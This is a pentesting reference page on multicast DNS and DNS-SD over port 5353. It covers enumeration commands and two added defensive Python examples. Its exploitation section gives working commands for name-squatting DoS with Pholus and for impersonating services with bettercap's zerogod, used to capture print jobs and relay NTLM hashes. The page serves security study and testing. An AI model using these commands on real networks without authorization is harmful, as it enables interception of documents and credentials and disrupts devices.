# Multicast DNS (mDNS) and DNS-SD - PORT 5353/UDP

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic Information

Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a **local link without a unicast DNS server**.

* **Port:** 5353/UDP
* **Multicast addresses:**
  * `224.0.0.251` (IPv4)
  * `FF02::FB` (IPv6)

It’s most commonly associated with **Apple Bonjour**, **IoT devices**, and **DNS-SD (DNS Service Discovery)**.

#### Key Protocol Details

* Names in the `.local` zone are resolved via mDNS.
* The **QU (Query Unicast)** bit may request unicast replies even for multicast questions.
* Implementations *should* ignore packets not sourced from the local link, but some stacks accept them (attack surface).
* Probing/announcing enforces unique host/service names → interfering can create **DoS / name squatting** conditions.

#### DNS-SD Service Model

Services are identified as `_<service>._tcp` or `_<service>._udp` under `.local`. Examples:

* `_ipp._tcp.local` → printers
* `_airplay._tcp.local` → AirPlay
* `_adb._tcp.local` → Android Debug Bridge

You can discover service types with `_services._dns-sd._udp.local`, then resolve discovered instances to SRV/TXT/A/AAAA.
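
An added example (not part of the original page): a minimal Python parser for the question section of an mDNS message that exposes the QU bit described under Key Protocol Details, plus the on-link source check that implementations should apply. The sample packet, the function names and the `192.168.1.0/24` network are constructed for illustration.

```python
import ipaddress
import struct

def encode_name(name):
    """Encode a dotted name as uncompressed DNS labels."""
    parts = [p.encode() for p in name.rstrip(".").split(".")]
    return b"".join(bytes([len(p)]) + p for p in parts) + b"\x00"

def read_name(pkt, off, depth=0):
    """Decode a (possibly compressed) name; return (name, next_offset)."""
    labels = []
    while True:
        n = pkt[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:  # compression pointer
            if depth > 10:
                raise ValueError("compression pointer loop")
            ptr = ((n & 0x3F) << 8) | pkt[off + 1]
            tail, _ = read_name(pkt, ptr, depth + 1)
            return ".".join(labels + [tail]), off + 2
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n

def parse_questions(pkt):
    """Return (name, qtype, qclass, wants_unicast) per question."""
    qdcount = struct.unpack("!H", pkt[4:6])[0]
    off, out = 12, []
    for _ in range(qdcount):
        name, off = read_name(pkt, off)
        qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        # In mDNS the top bit of QCLASS is the QU (unicast-response) bit.
        out.append((name, qtype, qclass & 0x7FFF, bool(qclass & 0x8000)))
    return out

def on_link(src, local_net):
    """True if the packet's source address is inside the local subnet."""
    return ipaddress.ip_address(src) in ipaddress.ip_network(local_net)

# Constructed sample: one PTR (12) question for the DNS-SD meta-query, QU set.
SAMPLE = (struct.pack("!6H", 0, 0, 1, 0, 0, 0)
          + encode_name("_services._dns-sd._udp.local")
          + struct.pack("!HH", 12, 0x8001))

if __name__ == "__main__":
    print(parse_questions(SAMPLE))
    print(on_link("203.0.113.5", "192.168.1.0/24"))  # off-link source
```

A query that arrives with the QU bit set from a source for which `on_link` is false is the case a responder should drop rather than answer.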

**Nmap scan result example:**

```
PORT     STATE SERVICE
5353/udp open  zeroconf
```

***

### Enumeration

#### Nmap

```bash
nmap -sU -p 5353 --script=dns-service-discovery <target>
```

Broadcast discovery **(on host)**:

```bash
sudo nmap --script=broadcast-dns-service-discovery 
```

#### Avahi (Linux)

```bash
# List service types
avahi-browse -bt _services._dns-sd._udp

# Browse all services and resolve to host/port
avahi-browse -art
```

#### Apple dns-sd (macOS)

```bash
# Browse all HTTP services
dns-sd -B _http._tcp

# Enumerate service types
dns-sd -B _services._dns-sd._udp

# Resolve a specific instance
dns-sd -L "My Printer" _ipp._tcp local
```

#### Packet Capture with Tshark

```bash
# Live capture
sudo tshark -i eth0 -f "udp port 5353" -Y mdns

# Only DNS-SD service list queries
sudo tshark -i eth0 -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```

**Tip:** Browsers/WebRTC often use **ephemeral mDNS hostnames** (`random-UUID.local`) to mask local IPs. If you see these, resolve them to pivot to real IPs.

***

### Exploitation

#### DoS / Name Squatting

During the probing phase, a host checks that its chosen name is unique. Spoofed conflict responses force it to pick a new name or fail.

Example with [**Pholus**](https://github.com/aatlasis/Pholus):

```bash
# Block new devices from taking names
sudo python3 pholus3.py eth0 -afre -stimeout 1000
```

#### Service Spoofing & Impersonation (MitM)

Impersonate advertised services (printers, AirPlay, HTTP) to **coerce clients into connecting to you**.

* Capture print jobs by spoofing `_ipp._tcp.local`
* Lure users to rogue HTTP services
* Relay NTLM hashes when Windows authenticates to spoofed services

With **bettercap’s zerogod** module:

```bash
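# Start bettercap from the shell with service discovery enabled
sudo bettercap -iface eth0 -eval "zerogod.discovery on"

# The remaining commands are entered at the bettercap interactive prompt,
# not in the shell.

# Impersonate all services of a host
zerogod.impersonate 192.168.1.42

# Save intercepted print jobs
set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
zerogod.impersonate 192.168.1.42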
```
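
For monitoring the two behaviours described above (probe conflicts and service impersonation), the following added example, which is not part of the original page or of any tool it mentions, runs simple detection logic over mDNS events already extracted from a capture. The event tuples, MAC addresses, function name, time window and threshold are all constructed assumptions.

```python
from collections import defaultdict

# Constructed sample events: (time_s, src_mac, kind, name, rdata)
EVENTS = [
    (0.00, "aa:aa:aa:00:00:01", "response", "printer.local", "192.168.1.42"),
    (5.00, "aa:aa:aa:00:00:02", "probe", "laptop.local", None),
    (5.05, "de:ad:be:ef:00:99", "response", "laptop.local", "192.168.1.66"),
    (5.30, "aa:aa:aa:00:00:02", "probe", "laptop-2.local", None),
    (5.34, "de:ad:be:ef:00:99", "response", "laptop-2.local", "192.168.1.66"),
    (5.60, "aa:aa:aa:00:00:02", "probe", "laptop-3.local", None),
    (5.63, "de:ad:be:ef:00:99", "response", "laptop-3.local", "192.168.1.66"),
    (9.00, "de:ad:be:ef:00:99", "response", "printer.local", "192.168.1.66"),
]

def detect(events, window=1.0, squat_threshold=3):
    """Return alerts for probe-conflict floods and changed name owners."""
    alerts = []
    owner = {}                    # name -> MAC that first answered for it
    probes = {}                   # name -> (time, MAC of the probing host)
    conflicts = defaultdict(set)  # responder MAC -> names it contested
    flagged = set()
    for ts, mac, kind, name, rdata in sorted(events, key=lambda e: e[0]):
        if kind == "probe":
            probes[name] = (ts, mac)
            continue
        probe = probes.get(name)
        # Another station answering a fresh probe is a name conflict.
        # One conflict can be legitimate; many names from one MAC is not.
        if probe and mac != probe[1] and ts - probe[0] <= window:
            conflicts[mac].add(name)
            if len(conflicts[mac]) >= squat_threshold and mac not in flagged:
                flagged.add(mac)
                alerts.append(("probe-conflict-flood", mac, len(conflicts[mac])))
            continue
        # An established name suddenly answered by a different MAC.
        first = owner.setdefault(name, mac)
        if first != mac:
            alerts.append(("owner-changed", name, first, mac, rdata))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Tune `window` and `squat_threshold` to the network; a device that legitimately changes NICs will also raise `owner-changed`, so treat it as a lead to verify rather than a verdict.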

***

### Recent Vulnerabilities

* **Avahi (Linux mDNS daemon)**
  * Reachable-assertion and D-Bus crash bugs (2023) → CVE-2023-38469..38473
  * Can crash `avahi-daemon`, disrupting discovery
* **Cisco IOS XE Wireless LAN Controller**
  * mDNS gateway DoS (2024, CVE-2024-20303)
  * Adjacent attacker can trigger high CPU & disconnect APs

